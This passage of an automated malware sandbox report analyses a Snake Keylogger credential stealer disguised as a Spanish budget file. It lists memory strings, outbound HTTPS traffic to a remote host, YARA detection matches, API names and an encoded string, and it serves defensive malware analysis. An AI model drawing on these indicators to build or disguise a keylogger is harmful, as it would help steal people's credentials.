                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000319A000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77$
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB_q
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49877 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_015042042_2_01504204
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0150E1342_2_0150E134
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_015070182_2_01507018
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07810E282_2_07810E28
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07817AF12_2_07817AF1
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781A7132_2_0781A713
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781A7582_2_0781A758
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781C6602_2_0781C660
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781C6702_2_0781C670
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781C2382_2_0781C238
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_078130D02_2_078130D0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07813F882_2_07813F88
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781CF482_2_0781CF48
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07813F772_2_07813F77
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07810E212_2_07810E21
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07813CEB2_2_07813CEB
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_07813CF02_2_07813CF0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 2_2_0781AB902_2_0781AB90
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030053805_2_03005380
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300D2885_2_0300D288
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030071185_2_03007118
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300C1485_2_0300C148
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300C7485_2_0300C748
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300C4785_2_0300C478
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CA185_2_0300CA18
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300E9885_2_0300E988
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030069B05_2_030069B0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CFB85_2_0300CFB8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_03009DE05_2_03009DE0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CCE85_2_0300CCE8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030053625_2_03005362
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300D2785_2_0300D278
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300C7385_2_0300C738
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300C4685_2_0300C468
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CA085_2_0300CA08
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_03003AA15_2_03003AA1
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300F9615_2_0300F961
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300F9705_2_0300F970
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300E97B5_2_0300E97B
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030029EC5_2_030029EC
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_030039EF5_2_030039EF
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CFA95_2_0300CFA9
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_03003E185_2_03003E18
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_0300CCD85_2_0300CCD8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C195485_2_05C19548
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1FC685_2_05C1FC68
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C19C185_2_05C19C18
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C150285_2_05C15028
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1DDFF5_2_05C1DDFF
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1D5455_2_05C1D545
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1D5505_2_05C1D550
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1CC8F5_2_05C1CC8F
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1CCA05_2_05C1CCA0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1178F5_2_05C1178F
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C117A05_2_05C117A0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C14FA35_2_05C14FA3
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1EF515_2_05C1EF51
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1EF605_2_05C1EF60
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C11E805_2_05C11E80
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1E6A05_2_05C1E6A0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1E6B05_2_05C1E6B0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C11E705_2_05C11E70
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1DE005_2_05C1DE00
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1D9995_2_05C1D999
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1D9A85_2_05C1D9A8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1295A5_2_05C1295A
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C129685_2_05C12968
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1D0F85_2_05C1D0F8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C100405_2_05C10040
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1F8015_2_05C1F801
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C100075_2_05C10007
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1F8105_2_05C1F810
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C150185_2_05C15018
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C18B915_2_05C18B91
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C18BA05_2_05C18BA0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1F3A85_2_05C1F3A8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1F3B85_2_05C1F3B8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1EB085_2_05C1EB08
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C10B205_2_05C10B20
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C10B305_2_05C10B30
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1E2495_2_05C1E249
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C1E2585_2_05C1E258
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000000.1290231489.0000000000C6A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1313850390.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1312841202.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1318757187.000000000BA20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748024506.00000000012F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exeBinary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.csBase64 encoded string: 'Xz5uie5TI+VAXJi5s+jK5JOMMKuvu0k+fP51uwEy6JFuAQXVFI2evOQ79rnb+BR6'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.AddAccessRule
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: _0020.SetAccessControl
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
